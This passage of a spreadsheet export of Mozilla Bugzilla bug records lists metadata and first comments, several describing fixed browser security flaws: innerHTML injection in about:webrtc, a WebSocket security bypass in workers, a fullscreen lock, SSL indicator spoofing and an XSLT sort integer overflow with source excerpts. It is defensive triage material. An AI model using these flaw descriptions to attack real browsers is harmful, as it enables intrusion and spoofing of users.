          <t>FIXED</t>
        </is>
      </c>
      <c r="P5209" t="inlineStr">
        <is>
          <t>[adv-main55+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5209" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5209" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5209" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T5209" t="n">
        <v>1</v>
      </c>
      <c r="U5209" t="n">
        <v>0</v>
      </c>
      <c r="V5209" t="n">
        <v>17</v>
      </c>
      <c r="W5209" t="inlineStr">
        <is>
          <t>(This would be a sec-critical, if there was a way for an attacker to inject markup to this page. It seems to me the information comes from the browser user through actual interaction and it's unlikely someone creates and uses a file called &lt;textarea&gt; :-))
JavaScript in about:webrtc should use textContent or escape HTML before assigning to .innerHTML
1) 
http://searchfox.org/mozilla-central/rev/1a054419976437d0778a2b89be1b00207a744e94/toolkit/content/aboutwebrtc/aboutWebrtc.js#143
&gt;      this.msg.innerHTML =
&gt;         `&lt;span class="info-label"&gt;${this._messageHeader}:&lt;/span&gt; ${this._message}`;
In this case, I suggest replacing &gt;&lt;'&amp; with their respective entities for both variables. This could be done with a tagged template string and an escape function like https://github.com/fxos-eng/sanitizer/blob/master/sanitizer.js#L46-L57
In
http://searchfox.org/mozilla-central/rev/1a054419976437d0778a2b89be1b00207a744e94/toolkit/content/aboutwebrtc/aboutWebrtc.js#308
&gt;       msg.innerHTML = `${data.error.name}: ${data.error.message}`;
I suggest using textContent instead of innerHTML
I am assigning this to you jib, because you have been modifying this file in the past. Please help me find someone else if you can not take this bug.</t>
        </is>
      </c>
      <c r="X5209" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5210">
      <c r="A5210" t="n">
        <v>285740</v>
      </c>
      <c r="B5210" t="inlineStr">
        <is>
          <t>2005-03-11 05:56:27 -0800</t>
        </is>
      </c>
      <c r="C5210" t="inlineStr">
        <is>
          <t>DBD::Pg must have the PG_BYTEA type specified for inserting BLOBs</t>
        </is>
      </c>
      <c r="D5210" t="inlineStr">
        <is>
          <t>2005-03-17 19:24:36 -0800</t>
        </is>
      </c>
      <c r="E5210" t="n">
        <v>1</v>
      </c>
      <c r="F5210" t="n">
        <v>1</v>
      </c>
      <c r="G5210" t="n">
        <v>4</v>
      </c>
      <c r="H5210" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5210" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5210" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5210" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L5210" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5210" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5210" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5210" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5210" t="inlineStr"/>
      <c r="Q5210" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5210" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5210" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T5210" t="n">
        <v>1</v>
      </c>
      <c r="U5210" t="n">
        <v>0</v>
      </c>
      <c r="V5210" t="n">
        <v>7</v>
      </c>
      <c r="W5210" t="inlineStr">
        <is>
          <t>You have to do:
$sth-&gt;bind_param(1, undef, { pg_type =&gt; DBD::Pg::PG_BYTEA });
before you insert anything into a BLOB using DBD::Pg.</t>
        </is>
      </c>
      <c r="X5210" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5211">
      <c r="A5211" t="n">
        <v>381317</v>
      </c>
      <c r="B5211" t="inlineStr">
        <is>
          <t>2007-05-20 01:23:56 -0700</t>
        </is>
      </c>
      <c r="C5211" t="inlineStr">
        <is>
          <t>Unauthorized OCSP response error</t>
        </is>
      </c>
      <c r="D5211" t="inlineStr">
        <is>
          <t>2008-05-15 17:19:28 -0700</t>
        </is>
      </c>
      <c r="E5211" t="n">
        <v>1</v>
      </c>
      <c r="F5211" t="n">
        <v>1</v>
      </c>
      <c r="G5211" t="n">
        <v>3</v>
      </c>
      <c r="H5211" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5211" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J5211" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K5211" t="inlineStr">
        <is>
          <t>3.11.7</t>
        </is>
      </c>
      <c r="L5211" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5211" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5211" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5211" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5211" t="inlineStr"/>
      <c r="Q5211" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5211" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5211" t="inlineStr">
        <is>
          <t>3.11.7</t>
        </is>
      </c>
      <c r="T5211" t="n">
        <v>1</v>
      </c>
      <c r="U5211" t="n">
        <v>0</v>
      </c>
      <c r="V5211" t="n">
        <v>25</v>
      </c>
      <c r="W5211" t="inlineStr">
        <is>
          <t>The checkin for Bug #338986 seems to have caused a regression in NSS 3.11.7 
It seems to have broken OCSP.  Apparently it wasn't tested adequately.  
A visit to https://www.startssl.com/ now gets error sec_error_ocsp_invalid_signing_cert
The regression is due to the new call to CERT_VerifyCACertForUsage in 
CERT_VerifyOCSPResponseSignature.  The problem is: CERT_VerifyCACertForUsage 
apparently produces the wrong answer for certUsageStatusResponder.
Because CERT_VerifyCACertForUsage says the CA is not verified, we report
that the signature on the OCSP response is invalid.  
This is partly my fault.  Using CERT_VerifyCACertForUsage was my idea.
I believe calling CERT_VerifyCACertForUsage is the right thing to do.
But the function is working incorrectly for that usage.  That may be 
my fault, too.  It now appears that we have no QA test for this function.
The error occurs at this code in CERT_VerifyCACertForUsage:
1087    if (!isca || (cert-&gt;nsCertType &amp; NS_CERT_TYPE_CA)) {
1088        isca = (cert-&gt;nsCertType &amp; caCertType) ? PR_TRUE : PR_FALSE;
1089    }
When it gets to that line, cert-&gt;nsCertType is 0x4000 and caCertTYPE IS 7
which causes the code to decide that the cert is not a valid CA for this 
usage.  caCertType got its value from CERT_KeyUsageAndTypeForCertUsage at 
line 966.</t>
        </is>
      </c>
      <c r="X5211" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5212">
      <c r="A5212" t="n">
        <v>1204269</v>
      </c>
      <c r="B5212" t="inlineStr">
        <is>
          <t>2015-09-12 13:51:23 -0700</t>
        </is>
      </c>
      <c r="C5212" t="inlineStr">
        <is>
          <t>WebSocket secure requirements can be bypassed in a worker</t>
        </is>
      </c>
      <c r="D5212" t="inlineStr">
        <is>
          <t>2016-07-02 11:29:07 -0700</t>
        </is>
      </c>
      <c r="E5212" t="n">
        <v>1</v>
      </c>
      <c r="F5212" t="n">
        <v>1</v>
      </c>
      <c r="G5212" t="n">
        <v>3</v>
      </c>
      <c r="H5212" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5212" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5212" t="inlineStr">
        <is>
          <t>Networking: WebSockets</t>
        </is>
      </c>
      <c r="K5212" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5212" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5212" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5212" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5212" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5212" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q5212" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5212" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5212" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T5212" t="n">
        <v>1</v>
      </c>
      <c r="U5212" t="n">
        <v>0</v>
      </c>
      <c r="V5212" t="n">
        <v>43</v>
      </c>
      <c r="W5212" t="inlineStr">
        <is>
          <t>See https://alice.csrf.jp/sw/websocket/.
What is happening is that GetEntryGlobal() in &lt;https://dxr.mozilla.org/mozilla-central/rev/9771bd5e56edd07e21cf008dcadc20d7ed970ce3/dom/base/WebSocket.cpp#1551&gt; is returning null, and our stack looks like this:
  * frame #0: 0x00000001030fcab1 XUL`mozilla::dom::ScriptSettingsStack::EntryGlobal() + 17 at ScriptSettings.cpp:72
    frame #1: 0x00000001030cdeb9 XUL`mozilla::dom::GetEntryGlobal() + 9 at ScriptSettings.cpp:188
    frame #2: 0x00000001030eae27 XUL`mozilla::dom::WebSocketImpl::Init(this=0x00000001300c3280, aCx=0x0000000000000000, aPrincipal=0x000000011e50a340, aURL=0x0000000130804720, aProtocolArray=0x0000000130804188, aScriptFile=0x000000012ad70de0, aScriptLine=5, aScriptColumn=13, aRv=0x00000001308046e8, aConnectionFailed=0x0000000130804137) + 2839 at WebSocket.cpp:1551
    frame #3: 0x00000001030fa4aa XUL`mozilla::dom::(anonymous namespace)::InitRunnable::InitWindowless(this=0x000000012ad70da0, aTopLevelWorkerPrivate=0x000000011e997600) + 330 at WebSocket.cpp:1093
    frame #4: 0x00000001030fa08d XUL`mozilla::dom::(anonymous namespace)::WebSocketMainThreadRunnable::MainThreadRun(this=0x000000012ad70da0) + 157 at WebSocket.cpp:1029
    frame #5: 0x0000000104eb87d3 XUL`mozilla::dom::workers::WorkerMainThreadRunnable::Run(this=0x000000012ad70da0) + 35 at WorkerRunnable.cpp:584
    frame #6: 0x00000001016f00a3 XUL`nsThread::ProcessNextEvent(this=0x000000010063d800, aMayWait=false, aResult=0x00007fff5fbfcee3) + 1795 at nsThread.cpp:874
    frame #7: 0x000000010176c331 XUL`NS_ProcessPendingEvents(aThread=0x000000010063d800, aTimeout=10) + 145 at nsThreadUtils.cpp:219
    frame #8: 0x00000001051f2f9e XUL`nsBaseAppShell::NativeEventCallback(this=0x00000001007b74c0) + 190 at nsBaseAppShell.cpp:97
    frame #9: 0x000000010528189a XUL`nsAppShell::ProcessGeckoEvents(aInfo=0x00000001007b74c0) + 442 at nsAppShell.mm:387
    frame #10: 0x00007fff8a719a01 CoreFoundation`__CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 17
    frame #11: 0x00007fff8a70bb8d CoreFoundation`__CFRunLoopDoSources0 + 269
    frame #12: 0x00007fff8a70b1bf CoreFoundation`__CFRunLoopRun + 927
    frame #13: 0x00007fff8a70abd8 CoreFoundation`CFRunLoopRunSpecific + 296
    frame #14: 0x00007fff8d0bd56f HIToolbox`RunCurrentEventLoopInMode + 235
    frame #15: 0x00007fff8d0bd2ea HIToolbox`ReceiveNextEventCommon + 431
    frame #16: 0x00007fff8d0bd12b HIToolbox`_BlockUntilNextEventMatchingListInModeWithFilter + 71
    frame #17: 0x00007fff941608ab AppKit`_DPSNextEvent + 978
    frame #18: 0x00007fff9415fe58 AppKit`-[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 346
    frame #19: 0x0000000105280404 XUL`-[GeckoNSApplication nextEventMatchingMask:untilDate:inMode:dequeue:](self=0x00000001007b7560, _cmd=0x00007fff94a7c7f8, mask=18446744073709551615, expiration=0x422d63c37f00000d, mode=0x00007fff79fe1040, flag='\x01') + 116 at nsAppShell.mm:121
    frame #20: 0x00007fff94155af3 AppKit`-[NSApplication run] + 594
    frame #21: 0x000000010528226c XUL`nsAppShell::Run(this=0x00000001007b74c0) + 172 at nsAppShell.mm:661
    frame #22: 0x000000010626976b XUL`nsAppStartup::Run(this=0x0000000119732be0) + 155 at nsAppStartup.cpp:281
    frame #23: 0x000000010633c991 XUL`XREMain::XRE_mainRun(this=0x00007fff5fbfee80) + 5841 at nsAppRunner.cpp:4292
    frame #24: 0x000000010633d247 XUL`XREMain::XRE_main(this=0x00007fff5fbfee80, argc=5, argv=0x00007fff5fbff788, aAppData=0x00007fff5fbff108) + 935 at nsAppRunner.cpp:4389
    frame #25: 0x000000010633d6c2 XUL`XRE_main(argc=5, argv=0x00007fff5fbff788, aAppData=0x00007fff5fbff108, aFlags=0) + 98 at nsAppRunner.cpp:4478
    frame #26: 0x0000000100001c48 firefox`do_main(argc=5, argv=0x00007fff5fbff788, xreDirectory=0x0000000100632ac0) + 1768 at nsBrowserApp.cpp:212
    frame #27: 0x000000010000108d firefox`main(argc=5, argv=0x00007fff5fbff788) + 285 at nsBrowserApp.cpp:399
    frame #28: 0x0000000100000b54 firefox`start + 52
I think we need to compute originIsHttps in the constructor of WebSocket and pass it down to WebSocketImpl::Init().</t>
        </is>
      </c>
      <c r="X5212" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5213">
      <c r="A5213" t="n">
        <v>506908</v>
      </c>
      <c r="B5213" t="inlineStr">
        <is>
          <t>2009-07-28 06:52:40 -0700</t>
        </is>
      </c>
      <c r="C5213" t="inlineStr">
        <is>
          <t>Update the "Features" page</t>
        </is>
      </c>
      <c r="D5213" t="inlineStr">
        <is>
          <t>2010-02-09 13:24:11 -0800</t>
        </is>
      </c>
      <c r="E5213" t="n">
        <v>1</v>
      </c>
      <c r="F5213" t="n">
        <v>1</v>
      </c>
      <c r="G5213" t="n">
        <v>4</v>
      </c>
      <c r="H5213" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5213" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5213" t="inlineStr">
        <is>
          <t>bugzilla.org</t>
        </is>
      </c>
      <c r="K5213" t="inlineStr">
        <is>
          <t>3.5</t>
        </is>
      </c>
      <c r="L5213" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5213" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5213" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5213" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5213" t="inlineStr"/>
      <c r="Q5213" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5213" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5213" t="inlineStr">
        <is>
          <t>Bugzilla 3.6</t>
        </is>
      </c>
      <c r="T5213" t="n">
        <v>1</v>
      </c>
      <c r="U5213" t="n">
        <v>0</v>
      </c>
      <c r="V5213" t="n">
        <v>5</v>
      </c>
      <c r="W5213" t="inlineStr">
        <is>
          <t>http://www.bugzilla.org/features/ hasn't been updated since May 2007, when we released Bugzilla 3.0. This means that all major new features implemented in 3.2 and 3.4 are missing (custom status workflow comes to mind).
As bloggers and other websites often point to this page to list the features Bugzilla has and to compare it with other BTS, it would be fine to have it up-to-date (maybe something to add to the TODO list when releasing a major new version?).</t>
        </is>
      </c>
      <c r="X5213" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5214">
      <c r="A5214" t="n">
        <v>1740389</v>
      </c>
      <c r="B5214" t="inlineStr">
        <is>
          <t>2021-11-09 16:49:31 -0800</t>
        </is>
      </c>
      <c r="C5214" t="inlineStr">
        <is>
          <t>Browser window is locked in fullscreen mode using window.resizeBy() or resizeTo()</t>
        </is>
      </c>
      <c r="D5214" t="inlineStr">
        <is>
          <t>2024-05-30 10:50:41 -0700</t>
        </is>
      </c>
      <c r="E5214" t="n">
        <v>1</v>
      </c>
      <c r="F5214" t="n">
        <v>1</v>
      </c>
      <c r="G5214" t="n">
        <v>3</v>
      </c>
      <c r="H5214" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5214" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5214" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5214" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5214" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5214" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N5214" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5214" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5214" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][adv-main96+][adv-ESR91.5+][sec-survey]</t>
        </is>
      </c>
      <c r="Q5214" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5214" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5214" t="inlineStr">
        <is>
          <t>97 Branch</t>
        </is>
      </c>
      <c r="T5214" t="n">
        <v>1</v>
      </c>
      <c r="U5214" t="n">
        <v>0</v>
      </c>
      <c r="V5214" t="n">
        <v>19</v>
      </c>
      <c r="W5214" t="inlineStr">
        <is>
          <t>Created attachment 9250107
launcher-fullscreen.bundle.html
After invoke `requestFullScreen` in the popup window then move the popup window using `moveBy` or `moveTo` the browser goes into full screen with hidden fullscreen notification and moreover fullscreen mode won't exit even repeatedly press "esc" multiple times.
## Tested on:
- Firefox Nightly 96.0a1 (2021-11-09) on Windows 11
- Firefox Release 94.0.1 on Windows 10 and Windows 11 
## Steps to reproduce:
1. Visit attached launcher-fullscreen.bundle.html
2. Click "Launch" button
3. Tap anywhere on the popup page
4. Browser goes into fullscreen with hidden fullscreen notification
5. Press "esc" multiple times to try exit the fullscreen mode
6. Browser still persist in fullscreen mode</t>
        </is>
      </c>
      <c r="X5214" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5215">
      <c r="A5215" t="n">
        <v>521461</v>
      </c>
      <c r="B5215" t="inlineStr">
        <is>
          <t>2009-10-09 12:09:51 -0700</t>
        </is>
      </c>
      <c r="C5215" t="inlineStr">
        <is>
          <t>SSL spoofing by setting location.href to SSL page with 204 (No Content) response</t>
        </is>
      </c>
      <c r="D5215" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E5215" t="n">
        <v>1</v>
      </c>
      <c r="F5215" t="n">
        <v>1</v>
      </c>
      <c r="G5215" t="n">
        <v>6</v>
      </c>
      <c r="H5215" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5215" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5215" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K5215" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5215" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5215" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5215" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5215" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5215" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q5215" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5215" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5215" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5215" t="n">
        <v>1</v>
      </c>
      <c r="U5215" t="n">
        <v>0</v>
      </c>
      <c r="V5215" t="n">
        <v>31</v>
      </c>
      <c r="W5215" t="inlineStr">
        <is>
          <t>This bug was reported to security@m.o by Jonathan Morgan:
I moved his PoC code into the attached testcase which requires being signed in to a Google account to get the requisite 204 response from https://www.google.com/calendar/perf.  Note the SSL indicators appear when viewing the testcase over http:  as well as file:.
From the email:
-----
If a secure (https) page returns HTTP status 204 (no content), then the current page will show a verified security certificate for the current page.  One such page is part of Google Calendar, which will give users a verified certificate for the site verified by Thawte. Quite a lot of people are perpetually signed in to their Google account, meaning that adding the following script to your site would make it appear verified and secure to any user who is currently signed into the Google account (even if it was an http site, not an https site).
-----</t>
        </is>
      </c>
      <c r="X5215" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5216">
      <c r="A5216" t="n">
        <v>821573</v>
      </c>
      <c r="B5216" t="inlineStr">
        <is>
          <t>2012-12-13 19:10:27 -0800</t>
        </is>
      </c>
      <c r="C5216" t="inlineStr">
        <is>
          <t>Stop allowing COWs to be passed as native interfaces</t>
        </is>
      </c>
      <c r="D5216" t="inlineStr">
        <is>
          <t>2016-06-04 16:00:52 -0700</t>
        </is>
      </c>
      <c r="E5216" t="n">
        <v>1</v>
      </c>
      <c r="F5216" t="n">
        <v>1</v>
      </c>
      <c r="G5216" t="n">
        <v>3</v>
      </c>
      <c r="H5216" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5216" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5216" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K5216" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5216" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5216" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5216" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5216" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5216" t="inlineStr">
        <is>
          <t>[adv-main34+]</t>
        </is>
      </c>
      <c r="Q5216" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5216" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5216" t="inlineStr">
        <is>
          <t>mozilla34</t>
        </is>
      </c>
      <c r="T5216" t="n">
        <v>1</v>
      </c>
      <c r="U5216" t="n">
        <v>0</v>
      </c>
      <c r="V5216" t="n">
        <v>9</v>
      </c>
      <c r="W5216" t="inlineStr">
        <is>
          <t>My patches in bug 658909 effectively make them so, and I discovered that this breaks the contact API, because it expects to be able to pass COWs into native XPCOM methods and have them appear as XPCJWrappedJS.
There's a pretty low chance that this is exploitable. Exploiting it involve finding a content-accessible native method that accepts an interface type not marked builtin-class whose method/property requirements are somehow satisfied by those on content-accessible chrome object and that somehow manipulates the XPCWrappedJS-wrapped chrome object in a harmful way.
I think this is unlikely, and this will be fixed by bug 658909 anyway. Still, I wanted to get it on file. So I'm flagging sec-low and marking the dep.</t>
        </is>
      </c>
      <c r="X5216" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5217">
      <c r="A5217" t="n">
        <v>554255</v>
      </c>
      <c r="B5217" t="inlineStr">
        <is>
          <t>2010-03-22 23:32:11 -0700</t>
        </is>
      </c>
      <c r="C5217" t="inlineStr">
        <is>
          <t>XSLT Sort Remote Code Execution Vulnerability (ZDI-CAN-747)</t>
        </is>
      </c>
      <c r="D5217" t="inlineStr">
        <is>
          <t>2010-07-24 14:20:50 -0700</t>
        </is>
      </c>
      <c r="E5217" t="n">
        <v>1</v>
      </c>
      <c r="F5217" t="n">
        <v>1</v>
      </c>
      <c r="G5217" t="n">
        <v>3</v>
      </c>
      <c r="H5217" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5217" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5217" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K5217" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5217" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5217" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5217" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5217" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5217" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q5217" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5217" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5217" t="inlineStr">
        <is>
          <t>mozilla1.9.3a5</t>
        </is>
      </c>
      <c r="T5217" t="n">
        <v>1</v>
      </c>
      <c r="U5217" t="n">
        <v>0</v>
      </c>
      <c r="V5217" t="n">
        <v>19</v>
      </c>
      <c r="W5217" t="inlineStr">
        <is>
          <t>Created attachment 434177
zdi's PoC
Reported to the security alias:
ZDI-CAN-747: Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability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render a malicious file.
The specific flaw exists within a particular XSLT transformation when
applied to an XML document. If a large number of elements have this
transformation applied to them, the application will misallocate a
buffer. Upon usage of this buffer, the application will copy more data
than allocated thus causing an overflow. This can lead to code execution
under the context of the application.
This bug is triggered via the XSLT sort function and is implemented in
the following code.
Upon evaluating of an XML statement, the application will execute the
following code. This code will count the number of sort keys, and then
add each key to a txNodeSorter element.
content/xslt/src/xslt/txInstructions.cpp:646
nsresult
txPushNewContext::execute(txExecutionState&amp; aEs)
{
    nsRefPtr&lt;txAExprResult&gt; exprRes;
    nsresult rv = mSelect-&gt;evaluate(aEs.getEvalContext(),
                                    getter_AddRefs(exprRes));   // XXX
    NS_ENSURE_SUCCESS(rv, rv);
    if (exprRes-&gt;getResultType() != txAExprResult::NODESET) {
        // XXX ErrorReport: nodeset expected
        return NS_ERROR_XSLT_NODESET_EXPECTED;
    }
    txNodeSet* nodes = static_cast&lt;txNodeSet*&gt;
                                  (static_cast&lt;txAExprResult*&gt;
                                              (exprRes));   // XXX:
nodes to sort
    if (nodes-&gt;isEmpty()) {
        aEs.gotoInstruction(mBailTarget);
        return NS_OK;
    }
    txNodeSorter sorter;
    PRUint32 i, count = mSortKeys.Length();
    for (i = 0; i &lt; count; ++i) {
        SortKey&amp; sort = mSortKeys[i];
        rv = sorter.addSortElement(sort.mSelectExpr, sort.mLangExpr,    
   // XXX: number of sort keys
                                   sort.mDataTypeExpr, sort.mOrderExpr,
                                   sort.mCaseOrderExpr,
                                   aEs.getEvalContext());
        NS_ENSURE_SUCCESS(rv, rv);
    }
    nsRefPtr&lt;txNodeSet&gt; sortedNodes;
    rv = sorter.sortNodeSet(nodes, &amp;aEs, getter_AddRefs(sortedNodes)); 
// XXX
    NS_ENSURE_SUCCESS(rv, rv);
This code will then add the specified key to the list of nodes to be
sorted.
content/xslt/src/xslt/txNodeSorter.cpp:68
nsresult
txNodeSorter::addSortElement(Expr* aSelectExpr, Expr* aLangExpr,
                             Expr* aDataTypeExpr, Expr* aOrderExpr,
                             Expr* aCaseOrderExpr, txIEvalContext*
aContext)
{
...
    // mSortKeys owns key now. 
    rv = mSortKeys.add(key);
    NS_ENSURE_SUCCESS(rv, rv);
    key.forget();
    mNKeys++;   // XXX
    return NS_OK;
}
After counting and copying the number of keys, the application will
proceed to sort the elements in this buffer. It does this by first
allocating via the following code.
content/xslt/src/xslt/txNodeSorter.cpp:157
nsresult
txNodeSorter::sortNodeSet(txNodeSet* aNodes, txExecutionState* aEs,
                          txNodeSet** aResult)
{
    if (mNKeys == 0 || aNodes-&gt;isEmpty()) {
        NS_ADDREF(*aResult = aNodes);
        return NS_OK;
    }
    *aResult = nsnull;
    nsRefPtr&lt;txNodeSet&gt; sortedNodes;
    nsresult rv =
aEs-&gt;recycler()-&gt;getNodeSet(getter_AddRefs(sortedNodes));
    NS_ENSURE_SUCCESS(rv, rv);
    txNodeSetContext* evalContext = new txNodeSetContext(aNodes, aEs);
    NS_ENSURE_TRUE(evalContext, NS_ERROR_OUT_OF_MEMORY);
    rv = aEs-&gt;pushEvalContext(evalContext);
    NS_ENSURE_SUCCESS(rv, rv);
    // Create and set up memoryblock for sort-values and indexarray
    PRUint32 len = static_cast&lt;PRUint32&gt;(aNodes-&gt;size());   // XXX
    void* mem = PR_Malloc(len * (sizeof(PRUint32) + mNKeys *
sizeof(TxObject*)));   // XXX
    NS_ENSURE_TRUE(mem, NS_ERROR_OUT_OF_MEMORY);
    PRUint32* indexes = static_cast&lt;PRUint32*&gt;(mem);    // XXX
    TxObject** sortValues = reinterpret_cast&lt;TxObject**&gt;(indexes +
len);
    PRUint32 i;
    for (i = 0; i &lt; len; ++i) {
        indexes[i] = i;
    }
    memset(sortValues, 0, len * mNKeys * sizeof(TxObject*));
The misallocation is located in the following line of code. In this
case, the attacker controls more than 32 of the bits within the
allocation which will allow one to cause an integer overflow.
void* mem = PR_Malloc(len * (sizeof(PRUint32) + mNKeys *
sizeof(TxObject*)));   
Upon causing of the integer overflow, a copy exists which initializes
that underallocated buffer.
    PRUint32 i;
    for (i = 0; i &lt; len; ++i) {
        indexes[i] = i;
    }
Version(s)  tested: Mozilla Firefox 3.6
Platform(s) tested: Windows XP SP3
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * Martin Barbella</t>
        </is>
      </c>
      <c r="X5217" t="n">
        <v>1</v>
